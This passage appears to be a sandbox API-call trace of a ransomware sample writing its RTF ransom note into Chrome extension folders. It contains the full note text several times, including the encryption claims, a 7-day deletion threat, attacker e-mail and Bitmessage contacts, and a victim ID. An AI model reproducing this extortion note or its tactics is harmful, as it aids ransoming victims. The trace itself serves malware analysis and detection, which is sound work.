\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.229] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.230] CloseHandle (hObject=0x294) returned 1 [0278.230] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0278.230] GetLastError () returned 0x2 [0278.230] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 